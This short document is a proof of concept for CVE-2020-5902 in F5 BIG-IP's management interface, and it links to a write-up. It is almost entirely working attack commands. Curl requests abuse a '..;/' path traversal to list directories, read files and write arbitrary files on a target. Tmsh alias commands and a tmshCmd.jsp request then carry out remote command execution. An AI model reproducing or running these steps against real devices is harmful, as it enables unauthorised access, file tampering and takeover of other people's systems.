Proof of Concept for CVE-2020-5902

https://medium.com/@un4gi/from-directory-traversal-to-rce-an-inside-look-at-cve-2020-5902-17bf483e4a9d

• curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/path/here/"

• curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/path/to/file"

• curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=<filename>&content=<content>"

• tmsh create cli alias private <aliasname> command "command"

• tmsh delete cli alias private <aliasname>

• curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=<command+here>"